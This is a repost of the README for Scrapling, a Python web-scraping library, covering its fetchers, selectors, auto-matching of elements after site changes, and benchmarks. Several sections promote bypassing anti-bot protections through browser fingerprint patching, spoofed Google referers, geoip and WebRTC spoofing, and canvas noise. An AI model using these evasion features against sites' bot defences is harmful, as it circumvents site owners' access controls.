FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayKitPloit - PenTest Tools!

Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • πŸ”„ Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • πŸ” Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling powerful features.

High Performance

  • πŸš€ Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • πŸ”‹ Memory Efficient: Optimized data structures for minimal memory footprint.
  • ⚑ Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • πŸ› οΈ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that takes less memory than standard dictionaries with added methods.
  • πŸ“ Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • πŸ”Œ Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • πŸ“˜ Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

# Library Time (ms) vs Scrapling
1 Scrapling 5.44 1.0x
2 Parsel/Scrapy 5.53 1.017x
3 Raw Lxml 6.76 1.243x
4 PyQuery 21.96 4.037x
5 Selectolax 67.12 12.338x
6 BS4 with Lxml 1307.03 240.263x
7 MechanicalSoup 1322.64 243.132x
8 BS4 with html5lib 3373.75 620.175x

As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.

Extraction By Text Speed Test

Library Time (ms) vs Scrapling
Scrapling 2.51 1.0x
AutoScraper 11.41 4.546x

Scrapling can find elements with more methods and it returns full element Adaptor objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.

[!NOTE] The auto_match argument is enabled by default which is the one you should care about the most as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers which makes Fetcher create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher methods is 3.

Hence: All headers generated by stealthy_headers argument can be overwritten by you through the headers argument

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

For the sake of simplicity, expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | βœ”οΈ | | block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | βœ”οΈ | | extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | βœ”οΈ | | block_webrtc | Blocks WebRTC entirely. | βœ”οΈ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ | | addons | List of Firefox addons to use. **Must be paths to extracted addons.** | βœ”οΈ | | humanize | Humanize the cursor movement. Takes either True or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | βœ”οΈ | | allow_webgl | Enabled by default. Disabling it WebGL not recommended as many WAFs now checks if WebGL is enabled. | βœ”οΈ | | geoip | Recommended to use with proxies; Automatically use IP's longitude, latitude, timezone, country, locale, & spoof the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | βœ”οΈ | | disable_ads | Disabled by default, this installs `uBlock Origin` addon on the browser if enabled. | βœ”οΈ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | βœ”οΈ | | wait_selector | Wait for a specific css selector to be in a specific state. | βœ”οΈ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ | | os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is Scrapling matching the fingerprints with the current OS. | βœ”οΈ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode option.

Hence using the real_chrome argument requires that you have Chrome browser installed on your device

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

Expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), or `False` for headful/visible mode. | βœ”οΈ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate a real Useragent of the same browser and use it.** | βœ”οΈ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | βœ”οΈ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ | | wait_selector | Wait for a specific css selector to be in a specific state. | βœ”οΈ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | βœ”οΈ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | βœ”οΈ | | extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if used together. | βœ”οΈ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ | | hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | βœ”οΈ | | disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | βœ”οΈ | | stealth | Enables stealth mode, always check the documentation to see what stealth mode does currently. | βœ”οΈ | | real_chrome | If you have Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | βœ”οΈ | | locale | Set the locale for the browser if wanted. The default value is `en-US`. | βœ”οΈ | | cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | βœ”οΈ | | nstbrowser_mode | Enables NSTBrowser mode, **it have to be used with `cdp_url` argument or it will get completely ignored.** | βœ”οΈ | | nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser's docker browserless config._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
# do something with it...

You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor object as an argument and return True if the condition satisfies or False otherwise like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)

If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes: 1. For the two examples above I used one time the Adaptor class and the second time the Fetcher class just to show you that you can create the Adaptor object by yourself if you have the source or fetch the source using any Fetcher class then it will create the Adaptor object for you. 2. Passing the auto_save argument with the auto_match argument set to False while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match argument.

  1. The auto_match parameter works only for Adaptor instances not Adaptors so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True) because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)

Find elements by filters

Inspired by BeautifulSoup's find_all function you can find elements by using find_all/find methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.

  • To be more specific:
  • Any string passed is considered a tag name
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content
  • Any functions passed are used as filters
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements that its text content match all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods but you have to set the identifier by yourself.

  • To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')

  • Now later when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
  • if you want to keep it as lxml.etree object, leave the adaptor_type argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it ) Hence all of these methods are methods from the TextHandler within that contains the text content so the same can be done directly if you call the .text property or equivalent selector function.

  • Doing operations on the text content itself includes

  • Cleaning the text from any white spaces and replacing consecutive spaces with single space python quote.clean()
  • You already know about the regex matching and the fast json parsing but did you know that all strings returned from the regex search are actually TextHandler objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
  • Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler that's read-only so it's faster and string values returned are actually TextHandler objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and can do partial searches. It might be handy in some cases (returns a generator of matches) python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
  • Serialize the current attributes to JSON bytes: python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
  • Converting it to a normal dictionary python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚑ Enlightening Questions and FAQs

This section addresses common questions about Scrapling, please read this section before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

